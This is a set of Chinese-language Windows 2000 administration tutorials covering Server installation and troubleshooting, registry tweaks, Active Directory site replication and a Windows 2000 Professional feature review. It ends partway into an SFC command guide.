    在执行 Windows 2000 Server 安装程序之前，建议备份当前的文件，除非计算机没有文件，或当前的操作系统文件已损坏。可以将这些文件备份到磁盘、磁带驱动器或网络中的其他计算机上。
§　将驱动器解压缩
在安装 Windows 2000 之前，要将所有的 DriveSpace 或 DoubleSpace 卷解压缩。不要在压缩的驱动器上安装 Windows 2000，除非这个驱动器是用 NTFS 文件系统的压缩功能执行的压缩。
§　禁用磁盘镜像
    在执行全新安装之前，如果目标计算机上安装有磁盘镜像，那么在运行安装程序之前要禁用它。在完成安装后，再重新启动磁盘镜像。
§　切断 UPS 设备
    如果目标计算机与不间断电源 (UPS) 相连，那么在运行安装程序之前要切断连接的串行电缆。因为 Windows 2000 安装程序会试图自动检测连接到串行端口上的设备，如果不切断，UPS 设备会在检测过程中产生问题。

启动安装程序及相关的设置步骤
    对于不同的环境，用户可以利用不同的方式启动 Windows 2000 Server 安装程序，下面用户介绍在不同的环境中启动安装程序。
1.在运行 Windows 的计算机上从光盘启动安装程序
    步骤1 将光盘插入驱动器。
    步骤2 要开始安装，执行下列操作之一：
§　对于运行高于 Windows 3.x 的任何版本 Windows 的计算机，等待安装程序显示对话框。
§　对于运行 Windows 3.x 的计算机，使用文件管理器转到光盘驱动器，并进入 I386 目录。然后，双击 Winnt.exe。
    注意：如果是在运行 Windows 3.x 或 MS-DOS 的计算机上运行安装程序，为了获得最高的效率，请使用磁盘高速缓存。否则安装过程（从 Winnt.exe 开始运行）将花费很长的时间。在运行 Windows 3.x 或 MS-DOS 的计算机上启用磁盘高速缓存的通常方式是使用 SMARTDrive。

2.从网络启动安装程序
    步骤1 在网络服务器上，既可通过插入光盘并共享该光盘驱动器来共享安装文件，也可通过将安装文件从光盘的 I386 文件夹复制到共享文件夹来共享安装文件。
    步骤2 在要安装 Windows 2000 的计算机上，连接共享的安装程序文件：
§　如果共享光盘驱动器，可连接共享驱动器并将转到 I386 文件夹。
§　如果要共享文件夹，连接该文件夹即可。
    步骤3 找到并运行位于光盘 I386 文件夹上的文件或共享文件夹的文件：
§　在运行 MS-DOS 或 Windows 3.x 的计算机上，运行 Winnt.exe。
§　在运行 Windows 95、Windows 98、Windows NT 3.51、Windows NT 4.0 或任何版本的 Windows 2000 计算机上，运行 Winnt32.exe。

3.在运行 MS-DOS 的计算机上为全新安装启动安装程序
    步骤1 将光盘插入驱动器。
    步骤2 在命令提示符下，键入
如 d:
其中 d 是光盘驱动器的驱动器号。
键入
cd i386
然后按回车键。
    步骤3 键入
winnt
然后按回车键。

4.通过从光盘启动计算机，为全新安装启动安装程序
    步骤1 确定要安装的计算机是否可从光盘驱动器启动，是否执行全新安装（不是升级）。只有满足以上两点才能继续。
    步骤2 关闭计算机，将光盘插入驱动器。
    步骤3 启动计算机，并等待安装程序显示对话框。
5．通过从软盘启动计算机，为全新安装启动安装程序
    步骤1 决定是执行全新安装还是升级。如果要执行全新安装，请继续。
    步骤2 找到 Windows 2000 安装软盘和 Windows 2000 光盘。
    步骤3 关闭计算机，将第一张安装磁盘插入计算机的 A 盘驱动器中。
    步骤4 打开计算机。
    在安装程序启动后，安装过程分为几个阶段，提示信息，复制文件和重新启动。根据启动安装程序的方式，可能需要重新启动两到三次计算机。出现配置服务器屏幕表明安装程序结束，可以使用此屏幕调整设置以便符合特定的需求。

安装及配置服务器
    下面通过从光盘或软盘启动计算机安装一个全新的 Windows 2000 Server ，如果用户需要升级现有的NT请参见附录一"将 Windows NT 4.0 迁移到 Windows 2000 Server"。
    启动安装程序后，就开始将必须得安装文件复制到磁盘中，然后显示出现一系列的对话框，用于设置系统相关的重要信息。
    步骤1 为 Windows 2000 Server 选择或创建一个分区
    在系统复制完安装文件并重新启动后，出现一个对话框要求创建或指定一个用于安装 Windows 2000 Server 的磁盘分区，用户可以在磁盘中未分区的可用空间上创建分区，也可以指定一个现有的分区，还可以删除一个或几个现有的分区然后创建一个新的分区。由于安装 Windows 2000 Server 的文件需要至少 1 GB 的可用磁盘空间，这在系统需求中已说明了，所以建议要创建或指定的分区大小应大于最小需求，分区的大小为 2-4 GB 就可以了。之后，选择文件系统。如果用户是升级，则可以使用当前的文件系统；然而，也可以更改为 NTFS，它是推荐的 Windows 2000 文件系统。
    步骤2 选择区域设置
    在"地区设置"对话框中，遵循指导来自定义语言、选择正确的时间区域和辅助功能设置。还可将 Windows 2000 设置为使用多种语言和地区选项。
    步骤3 设置个人化软件
    在"个人化软件"对话框，键入用户的姓名，还可键入单位（可选）。

步骤 4 选择许可协议方式
    在"授权模式"对话框，选择客户端的授权模式，可以是"每客户"或"每服务器"方式。对于新的安装，系统要求用户选择客户端的授权模式，如果是升级安装，客户许可协议方式将根据已有设置自动设定。如果用户无法确定授权方式，则选择"每服务器"方式，因为用户可以随时将"每服务器"方式转换为"每客户" 方式，但注意只能进行一次转换，且这种转换是不可逆的。
    步骤5 输入计算机名称
    对于大多数语言来说，建议不超过 15 个字符。对于需要更多存储空间的语言，例如中文、日文或韩文，建议不超过 7 个字符。
    建议在计算机名中只使用 Internet 标准的字符。这些标准字符包括数字 0 到 9、A 到 Z 的大写字母和小写字母以及连字符 (-)。如果网络上使用了 Microsoft DNS 服务，那么还可以使用范围更广的字符，包括 Unicode 字符和其他非标准字符，例如 & 符等。使用非标准字符可能会影响与网络上的非 Microsoft 软件的互操作性。
    计算机名的最大长度为 63 字节。如果名称超过 15 个字节（大多数语言是 15 个字符，有些语言是 7 个字符），安装 Windows 2000 以前的计算机只靠该名称的前 15 个字符来识别此计算机。此外，对于长于 15 个字节的名称，需要额外的配置步骤。
    如果此计算机是某个域的一部分，则选择的计算机名必须不同于域内的其他任何计算机。如果此计算机是某个域的一部分，且包含多个操作系统，那么每个操作系统使用的计算机名必须各不相同。

步骤6 设置管理员帐户密码
    在"管理员密码"对话框中，键入最多不超过 127 个英文字符的密码。为了具有最高的系统安全性，密码至少要 7 个字符（非强制性），并应采用大写字母、小写字母和数字以及其他字符（例如 *、? 或 $）的混合形式。 在"确认密码"对话框，再次键入密码。
    由于管理员帐户在 Windows 2000 中的特殊性，出于对系统安全性的考虑，用户要格外重视这个帐户。安装程序在计算机上创建了一个称作 Administrator 的用户帐户，它具有管理计算机全部配置的管理权限。管理这台计算机的人员一般使用此 Administrator 帐户。出于安全考虑，建议为 Administrator 帐户指定密码。将"管理员密码"设置为空，表明该帐户没有密码。在"确认密码"框内输入的密码必须与"管理员密码"中输入的密码完全一致。一定要谨记并保护好用户的密码。 在安装完成之后，为了获得最好的安全性，要更改 Administrator 帐户名（但不能删除它）并始终为该帐户设置一个安全性高的密码。
    步骤7 选择 Windows 2000 组件
    在"Windows 2000 组件"对话框，选择系统运行所需组件。对于 TCP/IP 网络用户通常需要的组件包括 DHCP、DNS 和 WINS。要选取这些组件，可在安装过程中，在"Windows 2000 组件"对话框内，选择"网络服务"，并单击"详细资料"，然后选择所需的一个或多个组件。
    如果在完成安装后，确定还需要其他组件，可以在以后添加这些必要的组件。要这样做，请在运行完安装程序之后，单击"开始"，指向"设置"，然后单击"控制面板"，在控制面板上，双击"添加/删除程序"。在添加/删除程序中，单击"添加/删除 Windows 组件"。

步骤8 设置日期和时间
    在"日期和时间设置"对话框中设置正确日期、时间和时区。如果想让系统自动调整夏时制，请选中"根据夏时制自动调整时钟"复选框。
    步骤9 设置网络选项
§　如果允许 Windows 2000 安装程序分配或获取 IP 地址，则在"网络设置"对话框中，单击"典型设置"。 Windows 2000 安装程序将检查域中是否有 DHCP 服务器。如果域内有 DHCP 服务器，则该服务器会提供 IP 地址。如果域内没有 DHCP 服务器，自动专用 IP 寻址 (APIPA) 功能会自动为这台计算机分配一个 IP 地址。
§　如果希望为计算机指定静态 IP 地址及 DNS 和 WINS 的设置则执行以下步骤
    1.在"网络设置"对话框，单击"自定义设置"。
    2.在"网络组件"对话框内，单击"Internet 协议 (TCP/IP)"。
    3.在"Internet 协议 (TCP/IP) 属性"对话框内，单击"使用下面的 IP 地址"。
    4.在"IP 地址"和"子网掩码"内，键入适当的数字（如果需要，还可指定"默认网关"）。
    5.在"使用下面的 DNS 服务器地址"下，键入首选的 DNS 服务器地址和备用的 DNS 服务器地址（可选）。如果本服务器是首选或备用 DNS 服务器，则要键入在上一步已分配好相同的 IP 地址。
    6.如果要使用 WINS 服务器，可单击"高级"，然后单击"高级 TCP/IP 设置"对话框的"WINS"选项卡，添加一个或多个 WINS 服务器的 IP 地址。如果本服务器是 WINS 服务器，则键入第 5 步为本机分配好的 IP 地址。

步骤10 指定工作组名或域名
    在此用户需要选择本机是属于工作组还是将本机加入到一个域中，并指定工作组名或域名。
    在安装向导完成 Windows 2000 Server 的安装后，计算机重新启动。至此用户已经完成了 Windows 2000 Server 的基本安装。下面进一步配置 Windows 2000 Server。
    系统重新启动后，以管理员身份登录，屏幕上将出现配置服务器程序，利用它用户可以轻松地进行进一步的服务器配置。用户也可以通过单击"开始"，指向"程序"，再指向"管理工具"，然后单击"配置服务器"，启动配置服务器程序。下面介绍以下"配置服务器"所提供的配置选项的详细信息。
    Active Directory
    设置用户帐户、组帐户及其策略、域、服务器角色、权限，还可以帮助维护系统的安全性、跟踪用户信息。
    文件系统
    设置和管理共享文件夹及其他共享网络资源。
    打印服务器
    设置和管理打印机、打印机队列以及其他与打印相关的元素

Web/Media 服务器
    创建管理 Internet 或企业内部网中的 Web 站点、多媒体站点、FTP 站点和其他功能。要使用这些服务，必须在 Windows 2000 Server 内安装相应的组件。
    网络
    选择、设置网络协议、远程访问和路由选择，包括DNS和DHCP服务
    应用程序服务器
    对消息队列、组件服务和跨网络的分布式应用程序的相关支持，也包括终端服务。
    高级
    Windows 2000 Resource Kit 支持工具和可选组件，例如远程安装、终端服务器、证书授权及在"基本安装"过程中未安装的组件。
    注意：如果用户不想在每次登陆时都启动 Windows 2000 配置服务器，则运行 Regedit.exe 将 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Setup\Welcome\srvwiz 的值改为 0 即可。

6、Windows 2000 Server 安装的疑难排除
    在安装和启动 Windows 2000 Server 时，用户可能会遇到一些问题造成无法正常的安装或启动 Windows 2000 Server，产生问题的原因多种多样在此不可能一一列举，下面列出一些常用的办法，用于判断和解决问题。
安装时的疑难排除
    在安装过程中当遇到问题，无法继续安装时，用户可以通过以下方法加以判断和解决：
§　在安装过程中，用户是否需要关闭高速缓存？
    计算机的系统高速缓存可能妨碍安装程序的进行。在安装过程中关闭高速缓存，可能会解决问题。当安装过程完成后，使系统高速缓冲内存可用。如果在安装后还是有相同的症状，有可能是高速缓存已经损坏。
§　检查 RAM 问题
    1.确认所有 RAM 条速度和类型相同，并且由相同的制造商制造。
    2.检查物理交换内存槽中 RAM 条的顺序。计算机 BIOS 可能要求 RAM 条以一定的顺序插入内存槽，或特定大小的内存要求放在特定的槽里。
    3.用第三方软件诊断 RAM 条。

§　计算机是否感染了引导扇区病毒？
    1.使用 Windows 2000 的防病毒工具，具体步骤如下
    单击"开始"，然后单击"运行"。
    键入 e:\support\ca_antiv\makedisk.bat a:，这里 e 是 CD-ROM 驱动器字母，而 a 是包含一张空白软盘的驱动器字母，然后按 ENTER。
    这将创建一个 Windows 2000 病毒扫描盘。
    在磁盘驱动器里，用病毒扫描盘重新启动计算机。
    当出现菜单的时候，选择"扫描和清除"。
    2.使用第三方的防病毒程序
§　用户是否需要给 RAM 添加等待状态？
    给 RAM 添加等待状态可解决这个问题。要做这项工作，必须进入 CMOS 设置。请参考计算机文档或与计算机厂商联系获取专门的说明。

§　检查驱动器布置结构
    检查驱动器的物理跳线和 CMOS 设置。
    如果驱动器都在相同的通道上，并且在 CMOS 里启用了辅通道，把 CD-ROM 驱动器移动到辅通道并且把它配置为主控的。
§　标明硬件冲突
    检查所有硬件组件的设置。确认没有硬件冲突存在。
    检查 BIOS 中 IDE 控制器的设置。
§　降低数据传输率
    进入 CMOS。
    将 PIO 模式（正常是 3 或 4）改变成 2。
    用户也可能需要关闭任何 ULTRA DMA 的设置。
§　驱动器电缆接上并工作了吗
    检查硬盘驱动器和 CD-ROM 驱动器电缆并核实驱动器是否正确地连接。
    用确知能正常工作的电缆代替它们进行测试。并将有问题的电缆替换掉。

7、开机启动时的疑难排除
    在启动计算机时，我可能会收到错误消息，可以利用以下方法加以判断并排除故障：
§　NTLDR 文件是否损坏或丢失？
    启动 Windows 2000 时，如果收到"BOOT：无法找到 NTLDR"，则 NTLDR 文件可能已损坏或已被删除。要替换该文件或其他丢失或损坏的启动文件，请执行紧急修复。用户将需要 Windows 2000 安装盘，如果有 安装 Windows 2000 时创建的紧急修复盘，也应当常备。
§　是否感染 MBR 或引导区病毒？
    启动 Windows 2000 时，主引导记录 (MBR) 或引导区感染的病毒将导致问题。如果最近用感染病毒的软盘启动计算机，则计算机很可能已感染 MBR 或引导区病毒。
    清除计算机中的病毒：
    用已查过病毒的软盘启动计算机。
    备份所有数据。
    用病毒扫描程序扫描硬盘以及最近格式化或使用的软盘。
    清除程序找到的任何病毒。
§　计算机的 BIOS 是否正在查找启动盘？
    如果计算机无法定位某个硬盘用作启动盘，用户将收到以下错误信息：
    1.没有安装 SCSI BIOS
    2.C 驱动器已经安装
    3.正在搜索目标 0

解决这个问题：
    检查硬盘的 SCSI ID。某些 SCSI 控制器不支持从 SCSI ID 为0 或 1 的磁盘启动。
    如果主适配器不用来控制 SCSI 硬盘，并且以前与所连设备及其相应的驱动程序一起使用，请禁用主适配器上的 BIOS。
§　BIOS 是否在访问 SCSI 控制器之前访问 IDE 控制器？
如果在先前只有 SCSI 硬盘的系统上安装 IDE 硬盘，并且系统试图在访问 SCSI 控制器之前访问 IDE 控制器，此时将出现"没有找到启动设备"的错误信息。
    在最新的系统中 BIOS 可以将系统配置成先从 SCSI 设备启动。然而，许多现有的 Intel 系统，没用控制访问 IDE 或 SCSI 先后次序的选项。要将系统配置成与新的 IDE 硬盘一起工作，请创建 Windows 2000 启动盘，设置新的 IDE 硬盘，然后在硬盘上安装 Windows 2000 系统文件。
    1.创建 Windows 2000 启动盘
    2.设置新的 IDE 硬盘
    3.在新 IDE 硬盘上安装 Windows 2000 启动文件
§　系统 BIOS 是否无法定位系统 IDE 控制器上的启动设备？
    如果 BIOS 配置错误，则启动和运行 Windows 2000 会出现问题，并且会收到"hdd 控制器失败"的错误信息。
    如果在系统中使用 SCSI 硬盘，请检查系统 BIOS 设置确保所有磁盘都配置为"未安装"或"无"。

§　控制器是否使用不同的 SCSI 转换方案？
    尽管 SCSI 是一种工业标准，但硬盘的逻辑布局与物理布局之间的关系可以不同。每个厂商使用自己的转换方案。将硬盘连接到新 SCSI 主适配器后对其进行低级格式化。如果用户不知道如何操作，请将计算机送到维修中心。重新格式化硬盘后，请启动并运行 Windows 2000，然后关闭系统。
§　硬盘上是否有活动分区？
    损坏的驱动器分区表可能产生"操作系统丢失"的错误信息。
    若碰到这样的问题，则无法通过常规方法恢复数据，尽管数据恢复服务可以从磁盘恢复数据。
    如果用户决定不将硬盘送到数据恢复服务，则需要自己重新格式化并对硬盘重新分区。这将破坏磁盘所有分区的全部数据。 然后，用户必须重新安装操作系统并用备份恢复数据。
§　硬盘是否在等待启动单元命令？
    如果用户收到"驱动器没有准备好"的错误信息，则硬盘可能等待 SCSI 主适配器的启动单元命令。
    启动单元命令在多个 SCSI 硬盘的系统中最为有用，因为该命令允许错开启动磁盘以避免突发的电源消耗。
    执行任务
    1.将 SCSI 主适配器配置为"发送启动单元命令"。
    2.如何配置 SCSI 主适配器和硬盘，请参考 SCSI 主适配器和硬盘文档，或与硬件供应商联系以获得技术支持和进一步信息。
    3.如果更改 SCSI 主适配器或硬盘配置，请试着启动并运行 Windows 2000，然后关闭系统。

1.7 其他设置
    通过以下的一些设置，用户可以更容易的使用和管理 Windows 2000 Server。
自定义启动信息
    步骤1 运行 Regedit.exe
    步骤2 在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current\Explorer\Tips 可以添加及修改启动提示信息更改显示顺序，计数值保存在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Tips\Next 中，如果需要可以修改。控制是否显示提示，设置 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Tips\Show 的值，当设置为 01000000 则显示提示，设置为 00000000 则不显示。
自动登录
    步骤1 运行 Regedit.exe
    步骤2 HKEY_LOCAL_MACHINE\Software\Microsoft\WindowNT \CurrentVersion\Winlogon
    步骤3 建立字符串值 DefaultDomainName，输入要登录的域名
    步骤4 建立字符串值 DefaultUserName ，输入要登录的用户名
    步骤5 建立字符串值 AutoAdminLogon ，设置值为1

步骤6 建立字符串值 DefaultPassWord,输入登录密码
    步骤7 退出注册表编辑器
更改登录时的背景图案
    改变登录前得背景图案
    步骤1 运行Regedit.exe
    步骤2 HKEY_USER\DEFAULT\ControlPanel\Desktop
    步骤3 双击Wallpaper Key,输入背景图案的路径（如：c:\winnt\background\1.bmp）
    步骤4 如果要修改背景颜色，则在HKEY_USER\DEFAULT\ControlPanel\Colors，然后双击Background,输入所需颜色的键值（如000为黑色）
    步骤5 退出注册表编辑器
不显示前一个登录者的名称
    步骤1 运行Regedit.exe
    步骤2 HKEY_LOCAL_MACHINE\Software\Microsoft\WindowNT \CurrentVersion\Winlogon
    步骤3 建立字符串值 DontDisplayLastUserName,将其值设置为1
    步骤4 退出注册表编辑器

如何激活或取消按 Ctrl+Alt+Del 键后输入登录信息
    步骤1 运行 Regedit.exe
    步骤2 HKEY_LOCAL_MACHINE\Software\Microsoft\WindowNT \CurrentVersion\Winlogon
    步骤3 双击 Disablecad ,如无需按 Ctrl+Alt+Del 键将其值设置为 1，否则将其值设置为 0
    步骤4 退出注册表编辑器
用户n分钟无操作，如何使其自动注销
    步骤1 运行 Regedit.exe
    步骤2 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Lanman Server\Parameters
    步骤3 建立 DWORD 键值 Disc ,将其值设置为无操作的分钟数
    步骤4 退出注册表编辑器

如何远程引导NT
    利用 NT Resource Kit 中提供的 SHUTDOWN.EXE 远程引导另一台计算机，具体命令如下
SHUTDOWN \\ <machine name> /l /r /y /c

返回


Site在活动目录中的应用

《一键清理系统垃圾》

Site在活动目录中的应用

我们在利用Windows NT4.0来规划设计我们的企业网络系统时，要根据企业构建的具体情况设计相应的域模型，如单域、多主域或单主域模型等。我们可以利用这些种类的域模型来规划企业的网络环境，实现对企业网络的组织、管理和控制。当我们去实现这种网络规划时，常常要根据企业内部的组织结构形式，作出符合实际需求的规划设计。如果是一个集团性质的大公司，我们常常需要把某一部门或一些工作关联性较大的部门设计成一个域，以方便组织和管理。这就给我们设计人员提出了一个很棘手的问题，如果这样一个域是由地理上分布在不同位置的计算机通过慢速连接构成的，那么通过慢速连接的PDC和BDC的信息同步就会因占据大量网络流量，影响网络的整体性能，面对这样一个问题，我们只能束手无策，根本没有任何控制方法。有位工程师曾半开玩笑的说：“每当他设计完成一个网络系统后，都会首先建议公司总裁将每一个域模型中的部门搬到一栋大楼中去。很多Novell的系统工程师会都有类似的苦恼。

当我接触到Windows 2000之后，Active Directory 的强大功能和人性化设计思想，令我们今后的网络规划设计更加方便和灵活。而Win2000的Active Directory中Site 概念的提出和实现，为管理和控制DC之间的信息同步提供强大工具，从而有效的解决了我们前面提出的那个曾令我们束手无策的难题。

所谓Site , 是指在物理上有较好的线路连接的能实现较快通讯速率的计算机的集合，一般是指一个LAN。而Site之间一般是通过慢速连接来实现信息通讯。可见Site 是对网络上计算机的实际的物理分布的一种客观反映。

有了Site这个概念之后，我们就可以将一个域中的计算机根据地理位置的分布分装在几个Site之中。在一个Site当中，Active Directory 利用复制组件和KCC形成一个DC之间复制同步的双向的环形，每个DC都有两个复制伙伴，它们之间形成完全的信息同步。当一个DC中的目录数据库发生变化，它会等待一段时间间隔后向它的复制伙伴发送变更通知，复制伙伴接到变更通知后，会从发生变化的DC上拷贝目录数据的变化信息。同样复制伙伴还会把变更信息发送给它的复制伙伴，从而实现整个Site内的DC 的同步。由于Site内采用快速而可靠的网络连接，因此Site 内DC之间的复制数据是不压缩的，这虽然增加了复制信息的要求的带宽，但减少了DC的处理数据的负担。一般情况下Site内DC的信息同步采用RPC协议，使数据复制快速、统一，使DC之间保持了较高的数据一致性。

在Site之间一般是通过慢速连接，只有有限的可用带宽并且数据传输不可靠。为了不影响慢速连接线路上的其它数据通讯，以及确保DC间目录复制的可靠性，Site间的DC的复制不采用Site内DC间复制的变更通知方式，而是采用复制调度的方式。在Site之间可以设定一个时间表和时间间隔，时间表决定在哪些时间允许复制发生，时间间隔指定在允许复制的时间内DC多久检查一次数据变更。这样我们就可以将Site间DC复制同步的时间表设定在网络流量较少的时候（比如午夜）。这时网络不拥挤相对而言也较可靠。而且在Site间DC的目录复制采用压缩的方法，复制信息可以被压缩至10%到15%，这样可以有效地优化网络带宽。

可见，我们通过合理地规划Active Directory上的Site，可以有效地控制Active Directory中DC的同步，优化网络带宽，提高网络性能。由于在Windows 2000的Active Directory 中，DC之间的同步不但涉及一个域内DC之间大量数据的同步，同时不同域的DC之间也有少量信息需要同步。当我们用Site来实现Active Directory中DC之间的复制布局时可以借助于 Site link 和Site link Bridge两种设置来帮助我们实现，从而形成一个更合理、更有效、更可靠的Active Directory中DC的复制布局，最大限度优化我们的网络系统。

返回


Win2000 Professional版的功能

《一键清理系统垃圾》

Win2000 Professional版的功能

    商业桌面和移动用户的梦幻系统 　　Windows 2000 Professional是Windows 2000家族中的客户端产品，是Wi ndows NT Workstation 4.0的升级换代产品。Windows 2000 Profession al的定位是取代Windows 95/98成为公司标准的商业桌面系统，并且是适合移动用户使用的操作系统。

    在今年的4月底，我在我自己使用的笔记本电脑上安装了Windows 2000 Professional Beta 3之后，又在其上安装了最新的Microsoft Office 2000。众多精彩的新功能和新特性，让我为其目瞪口呆，到处给同事演示、劝导他们也升级，把这套系统称为"Dream System"（梦幻系统）。

    作为一个知识经济时代的知识工作者，我每天要完成很多的工作，现在完全依赖于这样一套先进的信息系统在运转。我已经不可能退回到没有使用这套系统以前的状态了，因为没有新特性的支持，工作起来就不会得心应手。另外，从移动用户和网络管理员的角度来看Windows 2000 Professional，也有很多可圈可点之处。我就在下面，向大家一一道来。

    商业桌面用户的梦幻选择我们把每天在工作中需要和PC打交道的用户，称为商业桌面用户。他们需要用Word写文章，用Excel进行业务分析，用PowerPoint进行讨论和演讲，以及用OutLook来管理日常事务，或者用来上网查信息；他们一般不在PC上玩游戏，或者看VCD，PC对他们来说并不是娱乐工具。这就是典型的现代办公环境中的桌面用户。

    我们来看看Windows 2000 Professional是怎样来满足商业桌面用户需求的。Windo ws 2000 Professional在用户界面上有很大改进，其桌面上只有必须的那些图标，比如"我的文档"、" 我的电脑"和"我的网络位置"等，取消了原来的频道栏等内容，显得简洁明了。在Windows 2000 Profe ssional中，彻底贯彻了"控制面板"是管理配置中心的思想，把原来在"我的电脑"中出现的打印机和计划任务等，都移到了"控制面板"中。

    Windows 2000 Professional的开始菜单也和Office 2000的菜单一样，具有人工智能。它会观察用户的使用情况，仅仅显示那些最常用的项目，而通过点击一个双箭头，系统就会显示所有的项目。在W indows 2000 Professional中的Internet Explorer 5.0也有很多的特性带给Windows 2000，比如"自动完成"，但你要打开一个文件夹或者要浏览一个网站的时候，系统会自动地把输入项给填写完成，这个功能对于懒于记忆的人来说，是非常有用的。

    Windows 2000 Professional还有很好的"历史纪录"的能力，不管是曾经工作过的Of fice文档，还是浏览过的网页，都能帮你自动管理，省去了找秘书帮忙的需要。Windows Explorer可以和Internet Explorer自由切换，显示的也更漂亮，仿佛是你本地文件的一个小小"Intranet"，可以灵活地跳转。在Windows 2000中，你可以全文本地搜索一个文件；如果有活动目录的支持，你还可以搜索人员、打印机等，非常方便。

    现在建立网络连接也更简单，从"我的网络位置"的属性中，用户可以跟随着"网络连接向导"建立起远程拨号、连接到Internet或者建立一个"虚拟专用网"的连接等。我在世界各地出差，只要能连接到Internet（通过普通拨号上网PPP的方式），就可以和我们公司在Internet上的"虚拟专用网"网关联系，登录到我们的公司内部网中。这种虚拟专用网的实现，是完全基于Windows 2000软件实现的，成本非常低，是联网技术的一个长足进步。另外，计算机之间还可以通过红外线快速地通讯，例如：我的数码相机中的照片，也通常通过红外线连接下载到Window s 2000文件夹中。

    说起Windows 2000 Professional的安装，如果在Windows NT Workst ation上进行的升级，整个过程只需要点三次鼠标；也可以从Windows 95/98升级上来。因为Window s 2000支持7000多种外设，所有基本上你不需要提供厂家的驱动程序，一切都是Plug-and-Play，整个安装过程没有痛苦。如果需要安装打印机，本地的打印机可以自动检测到；网络打印机，不需要在本地安装驱动程序，只要连接上即可；还支持离线打印和TCP/IP打印。

    Windows 2000还是一个多语言的操作系统：任何一个版本的Windows 2000都可以观看和编辑任何一国语言的文档。如果加上了"多语言的用户界面"后，即使是同一台机器，也可以显示不同语言的菜单、对话框和帮助信息，方便是习惯不同语言的用户使用。这个特性对于全球经济活动越来越一体化的今天，特别具有重要意义。

    移动办公用户的梦幻选择我们看到现在的繁忙社会中，越来越多的人需要在路上工作；航空港、酒店中，人们都在笔记本电脑上辛勤地工作。我的这篇文章，就是我在自己家的卧室，用笔记本电脑在我膝盖上敲出来的。 　　移动用户有很多特别的业务需要，简单来说，他们希望系统能够智能地处理"在线"和"离线"两种情况。在线指的是用户通过网卡或Modem上网，处理公务和各种联系；离线指的是用户脱离了网络，单机工作。

    在安装了Windows 2000 Professional之后，移动用户可以右键点击"我的文档"选择" 属性"，把这个文件夹映射到文件服务器上的一个路径中。这样的话，用户就是在网络上操作所有的文件了。用户可以指定" 我的文档"在离线的时候也可以使用。这样的话，系统就自动作了一个本地的缓存。一旦网络连接断开，用户感觉不出差别，继续?quot;我的文档"中工作。其后，重新建立网络连接后，系统会自动地同步本地和网络服务器上的文件，如有冲突，可以让用户选择保存最新的版本。

    这一套机制，是Windows 2000中IntelliMirror（智能镜像）的一部分。它的优点是，文件在服务器上保存，便于共享和备份，没有丢失文件的担忧；在本地又有镜像，还不影响移动状态的工作，用户随时随地工作的成果还可以及时更新到服务器上。这一切对于用户来说，都是透明的；很多移动用户在得知这一功能后，告诉我们："这正是我所需要的！"

    Windows 2000 Professional对移动用户的支持，还体现在高级的电源管理特性上。我听到过很多用户抱怨Windows 98的开机时间太长，那么使用Windows 2000就可以避免这个问题。Win dows 2000提供了"休眠"的功能，可以把系统的内存写到硬盘上，系统就彻底关机了，没有任何电源的消耗；当需要使用电脑的时候，打开电源开关，只要不到一分钟的时间，系统就恢复到原来状态，可以立即工作了。

    Windows 2000的本地文件存储，可以采取加密文件的形式。这种加密的方法，对用户来讲，也是透明的；只要在文件属性上选择加密即可。即使笔记本丢失，捡到笔记本的人，也无法打开文件，降低了风险。Windows 2 000在文件系统上，还支持移动存储，远程存储和分布式文件系统等先进功能，就拿分布式文件系统来讲，整个企业的文件可以在逻辑上形成一个树状结构，而在物理上可以是分布式的。

    电脑管理员的梦幻选择刚才提到的很多特性，都是从最终用户的角度；下面，我从支持最终用户的管理员的角度，谈一谈Windows 2000的新特性。

    首先说一下安装。Windows 2000有一个Setup Manager可以用图形化向导程序帮助管理员来定制安装的脚本文件，提高大规模安装的效率。微软还提供了一个System Preparation的工具，可以用一个安装好的Windows 2000 Professional及安装好的应用，来共同作为磁盘镜像文件的模版，通过镜像文件的拷贝工具，快速地完成更多工作站的安装。如果工作站的网卡支持PXE，或者使用一张定制的软盘，管理员还可以完成从网络上全自动安装工作站的操作系统和应用程序。因为Windows 2000 Professional支持PnP，即使是不同类别的工作站安装，也可以用同一个镜像文件来完成。

    其次，在最终用户的使用过程中，管理员也有很多的控制权力。管理员可以通过对组策略(Group Polic y) 的设定，来定制用户的桌面，比如取消用户察看控制面板的能力，给用户自动安装某个应用等，这样可以大大降低技术支持的工作量。最典型的是对漫游用户(Roaming User)的管理。用户在任何一个机器上登录，都可获得他自己的桌面和应用。用户的文档都用上一节所说的"智能镜像"的功能，存在文件服务器上，管理员可以根据不同的用户和磁盘卷来分配"磁盘空间额度（Disk Quota）"，保证文件服务器不至于过载。

    Windows 2000 Professional的系统在设计上也更为强壮，减少了48种在Window s NT 4.0中需要重启的情况；甚至可以在机器运转的情况下，动态地改变磁盘卷的大小，也不需要重启。据我了解，很多Beta 3用户的体会都是Windows 2000 Professional不会宕机。微软也加强了对配合W indows 2000的软硬件进行测试的工作，称为Gold HCL，进一步提高了系统稳定性。Windows 2 000 Professional支持更多的内存，应用程序之间的内存管理机制也进一步提高，不会出现一个应用程序停止响应影响到整个系统的情况。

    管理员可以从活动目录的域中，选择某台计算机，右键点击以打开"计算机管理"的MMC管理工具，进行各种计算机管理工作。MMC是微软管理界面的简称，充分体现了管理对象的思想，右边是一个对象的层次结构，左边是各个对象的属性和状态等，还非常适合远程管理和管理授权。在"计算机管理"的MMC工具中，可以管理计算机各种部件、服务和磁盘等；其中还有一个"安全性设置工具"，可以方便地设定一些全局的安全配置条例，并且便于进行安全性审计。

返回


Win2000/XP下的SFC使用参数

《一键清理系统垃圾》

Win2000/XP下的SFC使用参数

Win98下有一个非常好用的工具--系统文件检查器，使用它可以很快速的检查出你的系统有没有系统文件丢失或者被修改，并且自动提醒你还愿系统文件以保证系统的稳定性，减少重新安装系统的麻烦，现在这个程序已经移植到Win2000里面了，不过使用的方法和Win98不同了，必须加上一定的参数才能够运行，这一点适合Win98有所不同的，那么有哪些参数呢？具体的参数有代表什么意义呢？现在让我来告诉你吧。

Win2000的SFC的启动方法很特别，要先进入虚拟DOS(运行cmd),然后才能输入sfc即参数，否则是不能够运行的。sfc的具体格式是：

SFC [/SCANNOW] [/SCANONCE] [/SCANBOOT] [/CANCEL] [/ENABLE] [/PURGECACHE] [/CACHE SIZE=x] [/QUIET]

各个参数的意思是：

